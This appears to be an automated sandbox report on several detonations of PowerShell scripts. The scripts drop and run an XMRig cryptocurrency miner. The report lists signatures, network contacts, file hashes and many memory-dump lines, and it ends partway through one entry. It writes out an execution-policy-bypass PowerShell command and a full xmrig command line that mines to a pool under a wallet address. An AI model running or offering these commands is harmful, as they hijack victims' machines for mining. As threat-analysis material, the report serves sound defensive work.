memory/1848-52-0x000002C6BE7C0000-0x000002C6BE7E0000-memory.dmp

memory/3932-53-0x00007FFE5BA93000-0x00007FFE5BA95000-memory.dmp

memory/1848-54-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-55-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-56-0x000002C6BE7E0000-0x000002C6BE800000-memory.dmp

memory/1848-57-0x000002C6BE7C0000-0x000002C6BE7E0000-memory.dmp

memory/1848-58-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-59-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-60-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-61-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-62-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-63-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-64-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-65-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-66-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-67-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-68-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-69-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-70-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-71-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-72-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-73-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-74-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-75-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-76-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-77-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-78-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-79-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-80-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-81-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-82-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-83-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-84-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-85-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-86-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-87-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-88-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-89-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-90-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-91-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-92-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-93-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-94-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-95-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-96-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-97-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-98-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-99-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-100-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-101-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-102-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-103-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-104-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-105-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-106-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-107-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-108-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-109-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-110-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-111-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-112-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-113-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-114-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-115-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-116-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1468-4-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x0000016FCC6B0000-0x0000016FCC6D2000-memory.dmp

memory/1468-8-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-9-0x0000016FCC860000-0x0000016FCC8D6000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_basnbjvx.abk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-61-0x0000016FCC840000-0x0000016FCC84A000-memory.dmp

memory/1468-48-0x0000016FCC9E0000-0x0000016FCC9F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/64-90-0x000001D4DC7E0000-0x000001D4DC800000-memory.dmp

memory/64-91-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-92-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/1468-93-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-94-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/64-95-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-96-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-97-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-98-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-99-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-100-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-101-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-102-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-103-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-104-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-105-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-106-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-107-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-108-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-109-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-110-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-111-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-112-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-113-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-114-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-115-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-116-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-117-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-118-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-119-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-120-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-121-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-122-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-123-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-124-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-125-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-126-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-127-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-128-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-129-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-130-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-131-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-132-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-133-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-134-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-135-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-136-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-137-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-138-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-139-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-140-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-141-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-142-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-143-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-144-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-145-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-146-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-147-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-148-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-149-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-150-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-151-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-152-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-153-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-154-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-155-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:50

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

memory/2828-3-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-5-0x0000029B43B30000-0x0000029B43B52000-memory.dmp

memory/2828-7-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-9-0x0000029B43CE0000-0x0000029B43D56000-memory.dmp

memory/2828-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilulcm5l.nyb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2828-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-49-0x0000029B43CC0000-0x0000029B43CD2000-memory.dmp

memory/2828-62-0x0000029B43A70000-0x0000029B43A7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/432-91-0x00000254E5340000-0x00000254E5360000-memory.dmp

memory/432-92-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-93-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/2828-94-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-95-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-96-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/432-97-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-98-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-99-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-100-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-101-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-102-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-103-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-104-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-105-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-106-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-107-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-108-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-109-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-110-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-111-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-112-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-113-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-114-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-115-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-116-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-117-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-118-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-119-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-120-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-121-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-122-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-123-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-124-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-125-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-126-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-127-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-128-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-129-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-130-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-131-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-132-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-133-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-134-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-135-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-136-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-137-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-138-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-139-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-140-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-141-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-142-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-143-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-144-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-145-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-146-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-147-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-148-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-149-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-150-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-151-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-152-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-153-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-154-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-155-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-156-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-157-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:57

Platform

win7-20240508-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2176-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

memory/2176-5-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2176-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/2176-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-8-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-9-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-10-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-11-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:01

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
